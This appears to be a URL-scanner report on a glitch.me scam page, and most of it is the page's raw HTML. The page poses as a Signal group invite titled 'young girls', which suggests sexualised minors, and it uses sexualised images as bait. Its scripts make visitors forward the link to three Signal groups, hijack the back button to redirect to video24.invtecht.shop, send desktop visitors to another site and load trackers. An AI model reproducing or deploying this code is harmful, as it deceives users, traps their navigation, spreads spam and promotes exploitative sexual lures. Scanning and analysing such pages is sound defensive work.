- 제출된 URL:
- https://signil-group355-9nwkgmxourjq6fu-packet.glitch.me/
- 보고서 완료:
링크 · 0개 결과
페이지에서 식별된 외부 링크
JavaScript 변수 · 33개 결과
페이지의 창 개체에 로드된 전역 JavaScript 변수는 함수 외부에서 선언된 변수로, 현재 범위 내에서 코드의 어느 부분에서나 액세스할 수 있습니다
이름 | 유형 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
a0p | function |
a0A | function |
LieDetector | object |
atAsyncContainers | object |
requestShare | function |
copyMessage | function |
hh | function |
콘솔 로그 메시지 · 1개 결과
웹 콘솔에 기록된 메시지
유형 | 카테고리 | 로그 |
---|---|---|
error | network |
|
HTML
페이지의 원시 HTML 본문
<!DOCTYPE html><html lang="es" xmlns="http://www.w3.org/1999/xhtml" xmlns:b="http://www.google.com/2005/gml/b" xmlns:data="http://www.google.com/2005/gml/data" xmlns:expr="http://www.google.com/2005/gml/expr"><head>
<script async="" referrerpolicy="unsafe-url" type="text/javascript" src="https://de.tynt.com/deb/v2?id=w!kiara02&dn=TC&cc=1&chmob=0&r=&pu=https%3A%2F%2Fsignil-group355-9nwkgmxourjq6fu-packet.glitch.me%2F%231731894724104"></script><script async="" type="text/javascript" src="https://cdn.tynt.com/tc.js"></script><script async="" type="text/javascript" src="//whos.amung.us/pingjs/?k=kiara02&t=%F0%9F%A4%A4%20young%20girls%20%F0%9F%91%A3%F0%9F%8C%B9&c=s&x=https%3A%2F%2Fsignil-group355-9nwkgmxourjq6fu-packet.glitch.me%2F&y=&a=0&d=0.978&v=27&r=4986"></script><script src="https://t.dtscout.com/i/?l=https%3A%2F%2Fsignil-group355-9nwkgmxourjq6fu-packet.glitch.me%2F&j=" async="" type="text/javascript"></script><script>if (typeof window.orientation == 'undefined' && screen.width >= 1000) { window.location.href = 'https://sabiaestos.com/'; }</script>
<link href="https://www.blogger.com/static/v1/widgets/466517130-widget_css_bundle_rtl.css" rel="stylesheet" type="text/css">
<meta content="#008069" name="theme-color">
<meta content="http://imgfz.com/i/Q0hApZr.jpeg
" name="og:image">
<meta content="Group chat invite" property="og:description">
<meta content="IE=EmulateIE7" http-equiv="X-UA-Compatible">
<meta content="noindex" name="robots">
<link href="https://site-assets.fontawesome.com/releases/v6.1.1/css/all.css" rel="stylesheet">
<meta content="width=device-width, initial-scale=1.0" name="viewport">
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<meta content="blogger" name="generator">
<!--Can't find substitution for tag [blog.ieCssRetrofitLinks]-->
<meta content="🤤young girls 👣🌹" property="og:title">
<meta content="" property="og:description">
<title>🤤 young girls 👣🌹</title>
<meta content="whatsapp.com" property="og:url">
<meta content="whatsapp.com" property="og:site_name" <meta="" charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Grupo de Signal</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f5f5f5;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
}
.chat-container {
width: 100%;
max-width: 600px;
height: 80vh;
background-color: #fff;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
border-radius: 10px;
display: flex;
flex-direction: column;
overflow: hidden;
position: relative;
}
.chat-header {
background-color: #007bff;
color: white;
padding: 10px 20px;
display: flex;
align-items: center;
justify-content: space-between;
flex-shrink: 0;
}
.chat-header h2 {
margin: 0;
font-size: 1.2rem;
}
.chat-messages {
flex: 1;
padding: 10px;
overflow-y: auto;
display: flex;
flex-direction: column;
}
.message {
display: flex;
margin-bottom: 10px;
align-items: flex-start;
}
.message .profile-pic {
width: 35px;
height: 35px;
border-radius: 50%;
margin-right: 10px;
}
.message .content {
max-width: calc(100% - 45px);
}
.message .sender {
font-weight: bold;
}
.message .text, .message .image, .message .alert {
background-color: #e1ffc7;
padding: 8px;
border-radius: 5px;
display: inline-block;
word-wrap: break-word;
}
.message .image img {
max-width: 100%;
border-radius: 5px;
}
.message .alert {
background-color: #ffd700;
}
.message.sent {
justify-content: flex-end;
}
.message.sent .text, .message.sent .image, .message.sent .alert {
background-color: #d1e7ff;
}
.message.sent .profile-pic {
order: 2;
margin-left: 10px;
margin-right: 0;
}
.chat-input {
padding: 10px;
border-top: 1px solid #ccc;
display: flex;
flex-direction: column;
align-items: center;
background-color: #f5f5f5;
}
.chat-input button {
padding: 10px 20px;
border: none;
border-radius: 5px;
color: white;
background-color: #007bff;
cursor: pointer;
margin-top: 10px;
}
.join-button, .copy-button {
background-color: #007bff;
color: white;
padding: 10px 20px;
border: none;
border-radius: 5px;
cursor: pointer;
margin-top: 20px;
display: block;
text-align: center;
}
.copy-button {
background-color: #28a745;
display: none; /* Hidden initially */
}
@media (max-width: 600px) {
.chat-header h2 {
font-size: 1rem;
}
.message .profile-pic {
width: 30px;
height: 30px;
}
.message .text, .message .image, .message .alert {
padding: 6px;
font-size: 0.9rem;
}
.chat-input input {
width: calc(100% - 22px);
padding: 8px;
margin-bottom: 10px;
}
.chat-input button {
width: 100%;
padding: 12px;
}
}
</style>
</head>
<body>
<div class="chat-container">
<div class="chat-header">
<h2>Grupo de Signal</h2>
</div>
<div class="chat-messages">
<div class="message received">
<img class="profile-pic" src="https://www.lavozdelanzarote.com/uploads/s1/20/58/07/7/juan-hernandez.jpeg" alt="Juan">
<div class="content">
<div class="sender">Juan</div>
<div class="text">¡Hola a todos!</div>
</div>
</div>
<div class="message sent">
<img class="profile-pic" src="https://previews.123rf.com/images/djsrki/djsrki1708/djsrki170800079/84083410-mujeres-j%C3%B3venes-sexys-en-la-cama.jpg" alt="Yo">
<div class="content">
<div class="sender">Yo</div>
<div class="text">Hola Juan, ¿cómo estás?</div>
</div>
</div>
<div class="message received">
<img class="profile-pic" src="https://previews.123rf.com/images/djsrki/djsrki1708/djsrki170800079/84083410-mujeres-j%C3%B3venes-sexys-en-la-cama.jpg" alt="María">
<div class="content">
<div class="sender">María</div>
<div class="text">AQUI AHI MUCHOS VIDEO de todos.</div>
</div>
</div>
<div class="message received">
<img class="profile-pic" src="https://www.lavozdelanzarote.com/uploads/s1/20/58/07/7/juan-hernandez.jpeg" alt="Juan">
<div class="content">
<div class="sender">Juan</div>
<div class="image">
<img src="http://imgfz.com/i/Q0hApZr.jpeg" alt="Imagen enviada por Juan">
</div>
</div>
</div>
<div class="message sent">
<img class="profile-pic" src="https://static3.bigstockphoto.com/0/1/4/large1500/41058502.jpg" alt="Yo">
<div class="content">
<div class="sender">Yo</div>
<div class="image">
<img src="http://imgfz.com/i/n4HDfNp.jpeg" alt="Imagen enviada por mí">
</div>
</div>
</div>
<div class="message alert">
<div class="content">
<div class="text">
Para unirte al grupo, primero comparte el siguiente mensaje en 3 grupos de Signal. Luego regresa aquí y haz clic en "Copiar" para completar el proceso.
</div>
</div>
</div>
</div>
<button id="joinButton" class="join-button" onclick="requestShare()">Unirse</button>
<script type="text/javascript" src="//www.topcreativeformat.com/0d76770450fa1ac5182e21298ca29742/invoke.js"></script>
<button id="copyButton" class="copy-button" onclick="copyMessage()">COPIAR GRUPO</button>
</div>
<script>
function requestShare() {
// Mostrar mensaje y botón de copiar
const message = "Para unirte, primero comparte el siguiente mensaje en tres grupos de https://signil-group355-9nwkgmxourjq6fu-packet.glitch.me";
alert(message);
// Mostrar el botón de copiar mensaje
document.getElementById('copyButton').style.display = 'block';
}
function copyMessage() {
const message = "Únete a nuestro grupo de Signal: https://signil-group355-9nwkgmxourjq6fu-packet.glitch.me";
navigator.clipboard.writeText(message).then(() => {
alert('Mensaje copiado al portapapeles. Ahora compártelo en 3 grupos de Signal.');
// Abrir Signal para compartir el mensaje
const signalLink = `signal://send?text=${encodeURIComponent(message)}`;
window.location.href = signalLink;
}).catch(err => {
console.error('Error al copiar al portapapeles: ', err);
alert('No se pudo copiar el mensaje. Por favor, copia el mensaje manualmente.');
});
}
</script>
<script>
window.onhashchange=function(){jp();};
function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
function jp() {
fh();}
setTimeout('hh();', 500);
function fh(){
location.href="https://video24.invtecht.shop/";
}
function goon(){
location.href="https://video24.invtecht.shop/";
}
</script>
<script id="_wau3cp">var _wau = _wau || []; _wau.push(["small", "kiara02", "3cp"]);</script><div title="Click to see what's popular on this site!" style="position: relative; display: inline-block; background-image: url("data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw=="); width: 80px; height: 15px; padding: 0px; margin: 0px; overflow: hidden; cursor: pointer; direction: ltr;"><div style="background-image: url("data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw=="); background-repeat: no-repeat; background-attachment: scroll; background-position: -5px -15px; position: absolute; width: 3px; height: 8px; top: 4px; left: 20px; line-height: 8px; overflow: hidden; padding: 0px; margin: 0px;"></div><div style="background-image: url("data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw=="); background-repeat: no-repeat; background-attachment: scroll; background-position: -5px -15px; position: absolute; width: 3px; height: 8px; top: 4px; left: 24px; line-height: 8px; overflow: hidden; padding: 0px; margin: 0px;"></div><div style="background-image: url("data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw=="); background-repeat: no-repeat; background-attachment: scroll; background-position: -8px -15px; position: absolute; width: 5px; height: 8px; top: 4px; left: 28px; line-height: 8px; overflow: hidden; padding: 0px; margin: 0px;"></div><div style="background-image: url("data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw=="); background-repeat: no-repeat; background-attachment: scroll; background-position: -50px -15px; position: absolute; width: 24px; height: 8px; top: 4px; left: 34px; line-height: 8px; overflow: hidden; padding: 0px; margin: 0px;"></div></div><script async="" src="//waust.at/s.js"></script>
</body></html>